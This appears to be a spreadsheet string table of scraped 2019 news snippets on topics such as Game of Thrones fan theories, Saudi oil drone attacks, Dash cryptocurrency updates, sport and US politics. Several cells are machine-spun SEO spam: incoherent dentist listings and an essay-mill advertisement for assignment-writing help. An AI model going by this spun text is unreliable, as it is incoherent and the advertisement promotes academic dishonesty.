    <t>The season eight finale of Game of Thrones saw arguably one of the most shocking deaths of the series as Jon Snow (played by Kit Harrington) came to his senses and realised what his lover Daenerys Targaryen (Emilia Clarke) had become. However, some fans were surprised at Jon’s actions despite his noble intentions behind the shock murder. As someone who server under the Night’s Watch, many fans found it hard to believe Jon would become a Kinslayer. And one fan has theorised how the series would have ended had Jon stayed true to his vows. Reddit user elltovver began: “Jon is horrified by the war. After the siege he turns even more numb. “Seeing that Grey Worm is executing PoW he tries to interfere but backs off when Grey Worm informs him of the queens orders. “He is above all loyal to his superiors and holding up his vows, promises personal honor, remember he needed to die to be able to leave the Night’s Watch. “Just like the great Ned Stark raised him to be. He loves Dany, but is scared of her. For the sake of his ‘brother and sisters’ he marries her and it turns in a very abusive relationship.” Moreover, the fictional plot saw that house Targaryen would be revived as Jon and Daenerys start a family. They added: “Nevertheless he fathers a lot of whiteblonde haired, purple eyed children, which revives house Targaryen. READ MORE: Game of Thrones alternate ending: Tyrion Lannister saves Daenerys “As queen-consort he is not often allowed to leave Kings Landing, he doesn’t like the south, but he grew so numb and emotionless that he didn’t even care anymore.” Could Jon face life without returning to the North? It seems he won’t be able to in the show’s real ending where he is exiled to the Night’s Watch. However, not all fans are convinced his willingness to serve Daenerys would take him this far. The Reddit user is not the only one to draft their own ending that sees Daenerys survive and marry Jon. Reddit user Dionne94 recently crafted a theory surrounding a happier ending for the show, The user began: “Dany and Jon get married and sit on new thrones with wooden carvings, dragons for Dany and wolves for Jon. Ghost sits beside Jon and Drogon flies above the throne room.” In the alternative plot Missandei (Nathalie Emmanual) was never killed, and therefore she is now the new Hand of the Queen, the user claims. The user added: “Tormund [Kristofer Hivju] goes north with the free folk as the new king beyond the wall. Arya [Maisie Williams] is the first female Lord Commander of the Kings Guard. “Sansa [Sophie Turner] is queen in the north, before she leaves she makes sure Tyrion [Peter Dinklage] is remembered as a war hero.” Source link</t>
  </si>
  <si>
    <t>NCIS season 17 will see Ziva David return to the CBS series. But does her ex-boyfriend Tony DiNozzo know the mother of his child is alive and will he come back in the new series? Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Saudi Aramco is aiming to restore by Monday about a third of its crude output that was disrupted after drone attacks on two key oil facilities, The Wall Street Journal reported Sunday,</t>
  </si>
  <si>
    <t>Sunrise broadcasts Live at Federation Square in Melbourne tomorrow ahead of the AFL Grand Final. Kochie, Sam, Nat, Beretts, Eddy and Sam Mac are Live for their annual event from 5:30am and inviting viewers to attend. Weekend Sunrise is also Live with co-host Basil Zempilas and weather presenter James Tobin at Federation Square on Saturday. We’ve lined up some amazing artists, Birds of Tokyo and Mike Brady will be performing Live with a special guest appearance by Conrad Sewell ahead of his National Anthem performance on Grand Final day. And we’ll be giving away AFL Grand Final tickets to the best-dressed fan on the day. Seven’s AFL Grand Final coverage continues with Game Day, hosted by Hamish McLachlan from the MCG to preview and analyse the premiership-decider with a stellar line-up including AFL superstars Nat Fyfe, Dom Sheed, Shaun Burgoyne, Jimmy Bartel, Shaun Grigg and Jude Bolton. The 2019 AFL Premiership season culminates at the MCG with the two best teams vying for the game’s ultimate prize in front of 100,000 screaming fans. The AFL season is poised for a thrilling finale as the Tigers bid for their second flag in three years and GWS aims to top a fairy-tale September with its maiden premiership. 5.30am tomorrow on Seven.</t>
  </si>
  <si>
    <t>() From Nagoya International Airport to all over Japan! (your travel reference video) The post () From Nagoya International Airport to all over Japan! (your travel reference video) appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Link to BallotPedia. NO MORE MASSACRES OF PEOPLE! Ban Assault Weapons NOW! STOP NATIONAL RIFLE ASSOCIATION TERRORISM! Download, Print and Sign the Petition NOW!</t>
  </si>
  <si>
    <t>Social commentator Prue MacSween says Victoria Premier Daniel Andrews is playing “a very high stakes game” by pushing for a 50 per cent renewable energy target. “He knows 82 per cent of the electricity generated in Victoria was from fossil fuels last year — how will it add up?” she said. The state could face blackouts during summer heat peaks if contingencies are not made after the Liddell power station closes in April 2023, according to energy regulator The Australian Energy Market Operator. Speaking to Sky News, Ms MacSween said the premier is “dragging” Victoria into the dark ages and hopes other states do not “bail him out” because “he needs to learn”. Image: News Corp Australia</t>
  </si>
  <si>
    <t>This week continues to be a fantastic week in Dash with new developments, integrations, and general news. Continue reading to get a summary of the week. Dash Network Research of the Week: Analysis Shows Average Dash InstantSend Transaction Settled in Under Two Seconds: Reddit user Antti-Kaikkonen, surveyed 1,000 Dash transactions and compared the times that each transaction took to receive an InstantSend lock and found that the average time among all transactions was 1.85 seconds. Further, the median time was 1.83 seconds with the minimum time to lock a transaction taking 1.45 seconds and the maximum time taking 4.59 seconds. Add to that the fact that Dash confirms blocks every 2.5 minutes compared to Bitcoin’s 10 minutes makes Dash much faster and more secure with ChainLocks over a shorter period of time. More exchanges are recognizing InstantSend and Dash’s faster security, including Coinbase. Dash Integrations of the Week: Swiss Cryptocurrency Exchange SMART VALOR Integrates Dash With Exclusive 10% Cash-Back Bonus: The Swiss cryptocurrency exchange and security token platform will be integrating Dash with trading pairs consisting of its own coin and fiat pairs. Additionally, until October 2nd, the platform will offer 10% cash back for users. the integration helps reinforce the popularity of Dash as some exchanges have announced intentions to delist Dash for its privacy features. CYBAVO Enterprise-Level Cryptocurrency Wallet Integrates Dash: Dash is being integrated into the enterprise-focused cryptocurrency storage and wallet management system’s vault service, which allows for custody and management of digital assets with a similar experience to that of a corporate bank account. Dash will now be available to larger institutions that require services such as transaction and spending limits, role assignments, scheduled withdrawals, balance-triggered payments, and detailed logs. This will better enable future integrations by organizations that require a higher level of service than what open-source projects can deliver. Dash Core Group Project Updates of the Week: Here’s an update from Brian Foster, Front End Product Owner, on what’s going on at Dash Core Group this week. In addition to the below development highlights at Dash Core Group this week, several team members have been in development workshops discussing key technical design topics for the upcoming phases of the Evolution Platform. Continued back-porting, fixes for Linux build &amp; fee calculations on Core UI redesign updates for Show QR code and transaction details on DashWallet iOS General News of the Week: Bitcoin Hashrate Flash-Crashes 40% Highlighting Pure Proof-of-Work Vulnerability: Earlier this week, the Bitcoin hashrate dropped from around 107 exahashes to a little over 59 exahashes making the network more vulnerable to attacks and calling into question the security of a pure PoW system. The exact cause is unknown, but some point to research that says over 75% of Bitcoin’s total mining power may be located within Chinese borders or that over 50% of Bitcoin’s mining come from just a few mining pools. The issue brings attention to Dash’s ChainLocks for offering greater security by combining the power of its masternode network with its miners. BitcoinABC Developer Discusses Development Funding Issues, Calls for “Tithe”: Bitcoin ABC developer Shammah Chancellor recently talked about development funding issues with the protocol because of a “market failure” and suggests that users consider making monthly donations in order to support the project. So far, the project has had to mostly rely on volunteer donations during fundraising campaigns, such as the most recent one that raised over 800 BCH and is now working towards 1600 BCH. The funding issues highlights the importance of Dash’s DAO Treasury system in enabling the network to fund projects without becoming beholden to large outside donors. Bisq Anonymous P2P Cryptocurrency Exchange Grows After LocalBitcoins KYC Crackdown: Consumers have begun shifting to anonymous, peer-to-peer, decentralized exchanges such as Bisq after popular peer-to-peer cryptocurrency exchange LocalBitcoins recently implemented basic KYC/AML verification. Coin.Dance showed that Bisq’s volume spiked from $3.233 million dollars four weeks before LocalBitcoins implemented their KYC to a peak of $10.746 million dollars the week of LocalBitcoins’ KYC implementation. The event comes as some exchanges are talking about delisting coins and shows that consumers now have more decentralized solutions to circumvent different forms of centralized controls. Bitcoin Mining is Ancient Tech Says Cornell Professor Emin Gün Sirer: Emin has said that Bitcoin mining as a security model is “ancient and badly parameterized” after a flash crash of the network’s hashrate earlier this week and questioned the reliability of a pure proof-of-work system. He specifically called into question Bitcoin’s very long block intervals of 10 minutes and its subsequent finalization time of 6 blocks or around 1 hour. He suggested that exchanges should extend the block confirmation requirements for Bitcoin and monitor confirmations more closely to ensure no attacks are occurring. Conversely, Coinbase has already recognized the enhanced security of Dash and its ChainLocks innovation by lowering the confirmation requirement to only 2 blocks. OKex Korea Delists Privacy Coins Citing Financial Action Task Force Rules: OKex has announced that it is delisting Dash, along with Monero, Zcash, Horizon, and Super Bitcoin on October 10th citing that they do not comply with Financial Action Task Force rules. Their announcement specifically cites the “travel rule” that the FATF “recommends that exchanges be able to collect relevant information such as the name and address of the sender and recipient of the virtual asset”. This joins a growing list of exchanges that are delisting so-called privacy coins out of fear that they will attract additional government attention. BTI Report Calls Coinbase and Kraken Among Cleanest Exchanges: The Blockchain Transparency Institute (BTI) has showed in a new report that Dash-supporting exchanges Coinbase and Kraken, and the U.S. and Japan in general are among the industry’s “cleanest”. The report specifically looked for signs of wash trading and also found that OKEx and Bibox, along with South Korea overall, leads exchanges with the highest percentage of wash trading, in excess of 75%. However, after removing the wash trading, they still were in the top 20 exchange list. Overall, Dash is listed on mostly “clean” exchanges found in the BTI report, helping to validate Dash’s compliance. Dash Media of the Week: Additionally, this weekend and early next week is Dash Convention – Europe, which will host a lot of interesting talks and presentations so make sure to tune in and follow Dash News on social media to get summaries of the event and learn about new things happening in the Dash Community.</t>
  </si>
  <si>
    <t>By Stephany Nunneley, Wednesday 18 September 2019 20h16 GMT If a zombie cat skinned was not scared enough, more and more zombies appear in Red Dead Online. Many Red Dead Online players have encountered zombies in the game, which suggests that Rockstar Games has something to offer Halloween fans. Or, new content similar to Red Dead Nightmare. What seems to be happening is that the corpses are not dead yet. Last week it was this poor mountain lion and a pile of dead and stripped horses – both insects – but this week they are real humans. Although they are not stripped, they are pale and their eyes seem to have a colorful shine reminiscent of a zombie. Players who have met the undead have posted their findings on reddit and all occurrences seem to unfold around Armadillo (thanks, Games Radar). This one shows a dead man standing, another corpse was also found standing, and then there is this example of a lady with scary green eyes. Some were found on the floor and one of them even moved his mouth as he wanted to talk. Or moan. Zombies tend to complain after all. It is also possible that these examples are bugs introduced in the summer update Red Dead Online. Although plausible, it seems to us at least, there are too many examples of shiny green eyes to make it look like an insect. Again, we do not know what's going on behind closed doors at Rockstar, so for now, think of it as something fun until we know what's really going on. Sometimes we include links to online stores. If you click on one and make a purchase, we could receive a small commission. For more information, go here.</t>
  </si>
  <si>
    <t>Hundreds of people gathered in City Square today to protest against climate change.</t>
  </si>
  <si>
    <t>Cheaper than Steam with a good amount of reviews for this simple, but fun turn based combat game. A dangerous survival adventure in space station labirynths. Turn-based combat, character progression, the atmosphere of impending threat. Collect and modify weapons, stock up on ammunition and first-aid kits, use your brain and think two steps ahead. Between you and the exit from the station - a horde of enemies who know nothing about fear or mercy. The "Wanderer" station is full of secrets for you to uncover. Perhaps, that's how we will find out what happened there and how the arrival of Max is connected with that. Or maybe not only that. The main thing to survive! If you think that the layout of the premises in the future will cease to be the fruit of the maniacal misanthrope's sick mind - you are deeply mistaken. Max will have to wade through the mazes, crowded with traps, enemies and other surprises. A simple straight path is for wimps!</t>
  </si>
  <si>
    <t>allthoughtswork</t>
  </si>
  <si>
    <t>I thought Americans were winning with the Pasta Bread Bowl but it seems Australians don’t like to lose. Meet the spaghetti panini (also comes in baked-beans-from-a-can flavor). They’ll have to beat the KFC Famous Bowls….</t>
  </si>
  <si>
    <t>Recipe is the latest innovation from Swiss chocolatier Barry CallebautIt is being hailed by its manufacturer as the newest chocolate since the hugely popular pink or ruby variety, and aimed unashamedly at the younger generation seeking healthier and more sustainable products.Swiss chocolate maker Barry Callebaut – one of the largest in the world – has launched a new recipe which it claims is the first to use the entire cacao or cocoa fruit – as opposed to just the beans – to pack a more fruity punch in the flavour. Continue reading… Read More</t>
  </si>
  <si>
    <t>Blonde bombshell Sierra Skye is no stranger to flaunting her dangerous curves for the camera. She’s constantly sharing sizzling shots with her 4.1 million Instagram followers that highlight all her assets. She’s a solo superstar, however — nearly every shot she takes is a selfie flaunting her curves with no one else in the picture. The focus is always entirely on her, her outfit, and whatever skin it exposes. In her latest post, Skye mixed it up a little bit by including another person in the shot — her boyfriend, influencer Roman Palumbo. Skye shared the intimate snap in honor of Palumbo’s birthday, as she stated in the caption, and the overall shot had her followers stunned. Click here to continue and read more… The Inquisitr</t>
  </si>
  <si>
    <t>Cesc Fabregas reveals why he rejected Real Madrid transfer for Arsenal Original Source Cesc Fabregas rejected Real Madrid while he was at Arsenal (Picture: Getty) Cesc Fabregas has revealed he rejected the chance to join Real Madrid on multiple occasions while at Arsenal. Spanish midfielder Fabregas joined Arsenal’s academy in 2003 at the age of 16 and made his first-team debut for the club later that year. Fabregas would go on to play more than 300 games for the Gunners and help the club win the FA Cup and reach the Champions League final in 2006. He eventually left Arsenal in 2011 to join Barcelona but says he turned down a number of opportunities to sign for Real Madrid when he was in north London. More: Football Speaking to Spanish outlet AS, Fabregas said: ‘They [Real Madrid] called me more than once or twice. ‘The first time I was very young. I was 18 and they offered me a big salary, but I felt like I belonged at Arsenal. ‘Wenger had bet the farm on me. I couldn’t leave. In any case, I’ll always be grateful to Madrid for the way they treated me. ‘When I was 23 I had a serious calf injury and they sent me a really nice message. To view this video please enable JavaScript, and consider upgrading to a web browser that supports HTML5 video ‘I’m grateful for their interest in me but I always dreamed of playing for Barcelona and if I felt that way it was for a reason. It all worked out pretty well for me.’ Fabregas left the Premier League for the second time earlier this year to join French club Monaco. The Spanish legend still enjoys playing but, at the age of 32, admits he is beginning to think about a coaching career after hanging up his boots. ‘I still want to play,’ Fabregas added. ‘I’m still enthusiastic and in my head I’m still in the zone. ‘I’m happy when I go in to train and I get angry when I lose a game. As long as that’s still the case I’ll keep going. ‘Although it’s true that now I analyse the game more than I used to and I feel a coaching instinct that I didn’t have before. We’ll see.’ Fabregas’ former English clubs Arsenal and Chelsea are currently fifth and 11th in the Premier League respectively. MORE: Christian Pulisic praises Frank Lampard for helping him to settle at Chelsea window.fbApi = (function () var fbApiInit = false; var awaitingReady = []; var notifyQ = function () var i = 0, l = awaitingReady.length; for (i = 0; i &lt; l; i++) awaitingReady[i](); ; var ready = function (cb) if (fbApiInit) cb(); else awaitingReady.push(cb); ; var checkLoaded = function () return fbApiInit; ; window.fbAsyncInit = function () FB.init( appId: '176908729004638', xfbml: true, version: 'v2.10' ); fbApiInit = true; notifyQ(); ; return 'ready' : ready, 'loaded' : checkLoaded ; )(); (function () function injectFBSDK() if ( window.fbApi &amp;&amp; window.fbApi.loaded() ) return; var d = document, s = 'script', id = 'facebook-jssdk'; var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.async = true; js.src = "http://connect.facebook.net/en_US/sdk.js"; fjs.parentNode.insertBefore(js, fjs); if ('object' === typeof metro &amp;&amp; 'article' === metro.pageData.type) window.addEventListener('metro:scroll', injectFBSDK, once: true); else window.addEventListener('DOMContentLoaded', injectFBSDK, once: true);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Cesc Fabregas reveals why he rejected Real Madrid transfer for Arsenal appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Letter appears for first time in book about Weinstein scandal See full article at Independent.co.uk » The post Harvey Weinstein’s brother wrote furious letter about ‘misbehaviour’ two years before sexual misconduct allegations emerged appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Preferred Dentist Near Airdrie Alberta Adult &amp; Children's Dental Appointment in Airdrie, Alberta The first step towards a beautiful, healthy smile is to schedule an appointment. Please contact our office by phone or complete the appointment request form below. Our scheduling. Friendliest Dentist In Airdrie Bayside Airdrie Dental &amp; Orthodontics serves patients in Airdrie Alberta and the surrounding areas. Book your visit! New patients are welcome. (403. Sleeping Bruxism Treatment Market Business Opportunities by Emerging Trends, Upcoming Enhancement, Size, Share and Growth Forecast to 2023 – The end-users in the global sleeping bruxism treatment market are hospitals, dental clinics, and others. thus leading to market growth. One of the most popular trends creating waves in sleeping. Highest Rated Dentist In Airdrie The top ten rated dentists in Greater Manchester – and why this one is number one – That means that every patient would recommend the surgery to friends and family. The 100pc rating after 93 reviews makes it. Friendliest Dentist Cosmetic Dental Clinic In Airdrie Alberta #1, 704 Main Street SE, Airdrie, Alberta View Practice Hours Facebook Instagram In-house Orthodontic Services Airdrie Dental Studio provides orthodontic services for our patients. Dental Clinic or Dentistry Clinic at Airdrie offering services like Teeth Whitening, Root Canal, Dental Implants, Bayside Dental &amp; Orthodontics Providing Cosmetic Dentistry Services – Airdrie, AB. the dental clinic offers a relaxing and comfortable environment when one visits the clinic, with the guarantee of unmatched customer service from the minute one walks through their. Enquire for a fast quote from Airdrie Dental Studio. Excellent ServiceScore : 8.2 from 6 votes. Airdrie in Alberta is the location of this dental clinic where pain free and stress free dentistry is performed by the expert team. All options are. Best Dentists in Airdrie, AB – Airdrie Choice Dental, Bayside Dental &amp; Orthodontics, Blunston Dental Group, North Main Family Dental, Sierra Springs Dental, Kingsview Dental, Nose Creek Dental Centre, Grace Family Dental, Sonata Dental, Yank. Main Street Dental Airdrie – 121 Main Street Suite, Airdrie, Alberta T4B 0P8 – Rated 5 based on 15 Reviews "Front office staff is always courteous and. Jump to Sections of this page. Main St. South Airdrie, Alberta T4B 2Y1 Canada Book Appointment Emergency Dentist Airdrie Springs | General, Family. we’re open evenings and weekends. Don’t let tooth pain keep you from work or school. Our Airdrie dental team will see you as. Airdrie Dentists Now Accepting New Patients! Airdries Newest Dental Clinic is Now Open – Get in touch today to book your appointment, walk-ins available. We follow the 2018 Alberta Dentists Fee guide, making dental treatment more affordable. Bayside Dental &amp; Orthodontics Offers Orthodontics Solutions in Airdrie – Airdrie, AB — (SBWIRE. Additionally, we offer top-notch customer care services, where our excellent staff will guide you.</t>
  </si>
  <si>
    <t>School climate strike activists call on theatre group to sever ties with oil firmSchool climate protesters who took to the streets in huge numbers across the UK last week are threatening to boycott the Royal Shakespeare Company over its sponsorship deal with BP.In a letter being sent to the RSC on Thursday, a group representing young people in towns and cities across the UK, says it will launch a boycott campaign unless the theatre company severs its ties with big oil. Continue reading… Read More</t>
  </si>
  <si>
    <t>Scott Douglas</t>
  </si>
  <si>
    <t>Antonio Felix da Costa’s much anticipated move to DS Techeetah has been confirmed by the Chinese team. The Portuguese quit his role as a BMW driver after five years with the German marque, and will fill the seat vacated by Andre Lotterer after he moved to Porsche ahead of their debut in the series. Da Costa has raced in Formula E since its inception, winning two races in that time including last season’s opener in Ad Diriyah. After that win though his title challenge faded – not helped by a clash with team-mate Alexander Sims in Marrakesh that eliminated him from the lead of the race. And Da Costa said that while deciding to leave BMW was a difficult decision, he couldn’t turn down the opportunity to win a title-winning team. “Getting the opportunity to join a double championship winning team in such a highly competitive motorsport category like Formula E it’s very rare,” he said. “It was a very hard decision to leave my current position but it’s an opportunity I just couldn’t say no to and I’m very excited to join Jean-Éric and everyone at DS Techeetah.” While Lotterer had shown glimpses of pace for the team he was comfortably outscored by Vergne, finishing fifty points behind him in last year’s driver’s standings. Vergne made reference to how important it was to have both cars scoring, saying that da Costa’s contribution to the team would be a vital one. “I am particularly proud to welcome Antonio in our team,” Vergne said. “His experience in this discipline and his speed will be crucial in our pursuit of victories and titles. “While awaiting the first race in Riyadh, he will be able to commence several test sessions together with Jean-Éric and help us to improve our DS E-Tense FE20.” Team Principal Mark Preston meanwhile said that he was looking forward to seeing what his new line-up could achieve. “It’s fantastic to have Antonio with the team,” Preston said. “He’s a good friend to all of us and we’re all looking forward to welcoming him and to see him in the gold and black DS Techeetah colours. “He will be a great, and fast, addition to the team and we’re all very excited to see what Jean-Eric and Antonio will deliver on track this coming year.”</t>
  </si>
  <si>
    <t>Android Authority The post Huawei Mate 30 series likely to launch without Western release date appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Hannibal: (Hot Bird 13C 13.0E, 2019-09-14 16:43)… KingOfSat News The post Hannibal: (Hot Bird 13C) appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Catalan Spanish Dictionary – travel dictionary to translate Catalan to Spanish. Click on the list to show Catalan or Spanish synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Catalan Spanish Dictionary →</t>
  </si>
  <si>
    <t>EVEN as a very young child, Lawrence Owens was never going to believe in something as illogical as Santa.</t>
  </si>
  <si>
    <t>Chris Knight</t>
  </si>
  <si>
    <t>Newcastle United defender DeAndre Yedlin has returned to full training after undergoing surgery for a recurrent groin injury This post written by Chris Knight originally appeared on ChronicleLive - Newcastle United FC. Read the full post here. Source</t>
  </si>
  <si>
    <t>ONLY a handful of votes are separating two Townsville GPs, as the race to be crowned the city’s top family GP gets tighter.</t>
  </si>
  <si>
    <t>Iran has denied responsibility for an attack on the world’s biggest oil plant. But new photos of one of the “drones” shot down by Saudi defences raise doubts about what caused the damage.</t>
  </si>
  <si>
    <t>Mark Reddie</t>
  </si>
  <si>
    <t>Isabela Camelo-Gomez will face court in Sydney today for the alleged murder of her mother, Irene Jones, almost two decades ago — a crime police say was financially motivated.</t>
  </si>
  <si>
    <t>Japanese Zulu Hangman game – select either to guess the Japanese or the Zulu word from the head word in the other language. The word to guess is represented by a row of dashes, giving the number of letters. View the history of words used in the game and click on the list to show … Continue reading Japanese Zulu Hangman →</t>
  </si>
  <si>
    <t>Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Downtown Georgetown Dental, King's Cove Family Dental, Market Place Dental Centre, Oksana M. Sawiak, DDS IMD. Preferred Dental Clinic Near Halton Hills Best Dentists in Georgetown, Halton Hills, ON – South Georgetown Dental Care, Georgetown Denture Clinic, Diana Dental, Lefebvre Ronald, Mountainview Dental, Argyll Dental Office, Georgetown Dentistry, Best Dentist Near Halton Hills Ontario Cosmetic Dentist In Halton Hills Ontario Highest Rated Dentist In Halton Hills Best Dental Clinic Near Halton Hills Best Cosmetic Dentists in Halton Hills, ON – Downtown Georgetown Dental, Sunnyview Dental – Georgetown, Market Place Dental. Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Top Dentist Near Halton Hills He was close with partners at his dentistry. He also was a licensed pilot and a committed air-racing official and. Cosmetic Dental Clinic Near Halton Hills Ontario 为您提供与 Oakville 相关的域名和网站信息，帮助您从域名应用的角度更好的了解域名是如何被使用的，为您使用域名提供参考依据。 Top Dentist In Halton Hills Top cities in United States Washington, D.C. It’s best to arrive a half-hour before your. “Our adventure takes place near Preferred Dental Clinic Near Halton Hills Ontario Barriefield Animal Hospital, two vet companion animal hospital in Kingston-ON, is hiring for a DVM (FT/PT). We are a clinic with a progressive mindset and recognize the importance of staying up.</t>
  </si>
  <si>
    <t>Phoebe Hosier</t>
  </si>
  <si>
    <t>In an six-hour police interview played to the jury, Ms Otto told detectives she and friend Bradley Purkiss had fantasised about living together and had often said things would be easier if her husband were dead.</t>
  </si>
  <si>
    <t>MORNING BRIEFING: Wet weather will continue across Sydney today with up to 20 millimetres of rain forecast and the NSW Premier is aiming to ban cash donations of more than $100 to political parties.</t>
  </si>
  <si>
    <t>Adam Hadwin and Corey Conners each opened the Safeway Open in Napa, Calif., with a seven-under 68 that leaves both Canadians tied for eighth going into Friday’s second round. Nick Taylor finished the day with a score of 69 and is tied for 15th. For all the scores, click here.</t>
  </si>
  <si>
    <t>Our experts give high priority to satisfy the requirement of each rework. Like during the elections, various research businesses conduct opinion polls across the nation to predict who’s going to win in the elections. If students don’t have the capability to comprehend such alterations, it is probable they can make mistakes. Here’s What I Know About Online Assignment Help Canada Information are found in numerous languages. Beginning from the subject associated queries to all types of visit this page price or delivery timing related constraints, an individual can discuss everything during the on-line customer service team that remains 24 x 7 available to get your queries. Locate the choice in the menu of our website, and you’ll observe the list of the FAQ we’ve made for you. The process of growing assignment help on the internet is very easy. The variety of revisions is unlimited so long as you request them within 2-4 weeks following your item was completed. Well there are a lot of reasons to that. A Startling Fact about Online Assignment Help Canada Uncovered Leading quality for a moderate price is now a reality now! You are able to surely look forward to our Canada assignment assist and seek our service at https://tigerprints.clemson.edu/cgi/viewcontent.cgi?article=3731&amp;context=tiger_newspaper any moment! You are going to receive all form of homework help service at affordable price. For a simple time picking a reliable academic writing agency, you need to understand what things to look for. Each time you go to our website and ask us to compose my essays, we are more than pleased to aid you with that and assist during the entire course of action. You will probably have content that doesn’t make sense. Lies You’ve Been Told About Online Assignment Help Canada University guidelines have to be followed in academic papers. In some instances, students still feel that it’s challenging to do their assignment in the aftermath of alluding to assignment illustrations. The majority of the work you have may keep you from writing an essay that may offer you the grade which you’ve been yearning for. Such a number of experts lets us deal with various tasks whether you should compose a paper from scratch or simply select the ideal topic for your essay. Whatever might be how to fill out an assignment contract toronto the situation, our clients don’t need to be concerned about plagiarism. What’s more, if you’re not content with our work, you just need to share your feedback with us and we’ll make the changes you require. Nowadays you don’t need to elect for hit-and-trial process for getting ‘my assignment help’ online support. No matter how long you get to finish the assignment, it always appears to be less. Online Assignment Help Canada and Online Assignment Help Canada – The Perfect Combination Limitations of SPSS are extremely expensive, difficult to work on SPSS and intricate graphics features used to symbolize data in its different kinds of views. Writing assignments entails tons of activities based on the topic or course that you’re pursuing. If you give a lousy assignment to your college, it’s possible to easily lose 50% of the marks that are crucial for a superior academic record. It is critical to submit assignments or homework to the professors so as to clear the training course. Nowadays, the majority of the students find challenges in executing the important assignment. Thus, when you have decided to cover online assignment help Australia, you’re guaranteed to find the most professional services which can be availed. You will be completely amazed by the degree of services we provide. Our services are designed to offer aid with assignment completion in every possible way. You won’t ever fail by choosing us if you don’t want anybody to know you used our expert services. Main basic advantage of assignment in comparison to several on-line tutoring websites is it’s easy as sociable, which is also famous for its quality. When you acquire assignment writing services from us, you’re going to be in a position to conserve a very good sum of money. What is Really Happening with Online Assignment Help Canada The assistance that’s supplied by our advertising experts is such that it’s going to be quite easy for students to acquire the maximum grade in their advertising assignment with our effective advertising homework help. Also, our experts make certain that the students can receive the best grades for their assignment even in the limited time that can be found to them. Most of our experts are proficient in various fields of study to make sure your homework is in the correct hands. If you’re pursuing an economics degree and would like to acquire superior grades, you need to employ professionals of financial assignment help. Powerknowledge physical science is an internet resource specifically intended for learners in and homework help. Obviously, it isn’t merely a psychology assignment help given. The Lost Secret of Online Assignment Help Canada It’s common for students to avail on-line assignment assist and find assignments online. Use a little Canadian assignment help if you wish. Whenever it will become tough to control the assignments in college, buying assignment help is a sensible alternative. Assignment writing isn’t a joke. Assignment help is the chief key supporting the success of several students. Thus, when you decide to pay someone to do your Assignment, you need not appear beyond us. The Benefits of Online Assignment Help Canada Transtutors is a location where you can locate all assignment help easily. With our assistance, you will have the time to relax and focus on other pursuits. You can depend on our math help using these difficult times!</t>
  </si>
  <si>
    <t>An Ellyse Perry ton and a record-equalling Ashleigh Gardner half century steered Australia to a commanding win against the West Indies to secure the series.</t>
  </si>
  <si>
    <t>By Emily Gera, Monday September 30, 2019 at 17:51 GMT After an update of Apple's operating system, PlayStation owners can now use their DualShock 4 wireless controller to play PS4 games on iPad, iPhone and Mac. Hundreds of controller-compatible games are available on Apple devices, but a PS4 remote player app will let you play all your PS4 games via iOS 13, OS OS, TV OS 13 and, later, in October , macOS Catalina. "Remote playback requires a Wi-Fi connected remote play application, a compatible game, the PS4 system with software version 6.5 or later, the iPhone 7, the iPad 6 or a second-generation iPad with iOS 12.1 or higher installed, as well as a broadband Internet connection. "Said Anand Agarwal, director of peripherals and sports marketing at Sony Interactive Entertainment. "The PS4 system with a wired connection via a LAN cable is also recommended." Unfortunately, depending on the Apple device, some features of the DualShock 4 controller are not supported. These include the touchpad, the vibration function, the motion sensor, and the headphone jack for audio. Similarly, in some cases, users will still need to use the touch controls on their device's screen to access the PS, Share, and Options buttons. Check out a complete FAQ on the official PlayStation blog. Sometimes we include links to online stores. If you click on one and make a purchase, we could receive a small commission. For more information, go here.</t>
  </si>
  <si>
    <t>Emily Mertz</t>
  </si>
  <si>
    <t>In a letter, Amnesty explains it's worried those initiatives undermine and violate a range of Alberta's human rights obligations.</t>
  </si>
  <si>
    <t>THERE’S “overwhelming” opposition against the Palaszczuk Government’s proposed night before Christmas public holiday, with several industry bodies rallying against the move amid concerns it would be dire for small business.</t>
  </si>
  <si>
    <t>Flower Mound, Texas News Trump ignores impeachment inquiry as he jokes about Bad Hombres and praises ICE at Hispanic event California man sentenced to 180 DAYS in jail for sending a fake mass shooting warning to a fair ‘Freak’ early winter storm could bring up to 50 INCHES of snow to Montana Giuliani suddenly pulls out of paid appearance at Russia-backed conference in Armenia Pregnant wife of man shot dead by his friend reveals her grief that he will never see his daughter Meghan Markle has been wearing £450 ‘evil eye’ necklace to keep foes away White House staff ‘restricted access to records of Trump’s calls with Putin and Saudi Crown Prince’ Trump ignores impeachment inquiry as he jokes about Bad Hombres and praises ICE at Hispanic event Posted: 27 Sep 2019 11:27 PM PDT President Donald Trump appeared able to let his hair down and ignore the increasing pressure of the impeachment inquiry as he spoke at the Hispanic Heritage celebration on Friday in the White House. via https://youtu.be/mFQfuwZZ8h8 California man sentenced to 180 DAYS in jail for sending a fake mass shooting warning to a fair Posted: 27 Sep 2019 11:27 PM PDT Erik Villaseñor, 24, was sentenced to 180 days in jail and three years probation after he email authorities a fake mass shooting warning to avoid going to the county fair with his family via https://youtu.be/mFQfuwZZ8h8 ‘Freak’ early winter storm could bring up to 50 INCHES of snow to Montana Posted: 27 Sep 2019 11:27 PM PDT The storm storm is expected to bring record snow and cold unusually early to parts of the Rocky Mountains, as temperatures plummet in neighboring states in coming days. via https://youtu.be/mFQfuwZZ8h8 Giuliani suddenly pulls out of paid appearance at Russia-backed conference in Armenia Posted: 27 Sep 2019 10:42 PM PDT Rudy Giuliani (left) has pulled out of a scheduled appearance at a Russia-backed trade conference which Vladimir Putin (right) and his top advisor, Sergev Glazyev (center), would also appear at. via https://youtu.be/mFQfuwZZ8h8 Pregnant wife of man shot dead by his friend reveals her grief that he will never see his daughter Posted: 27 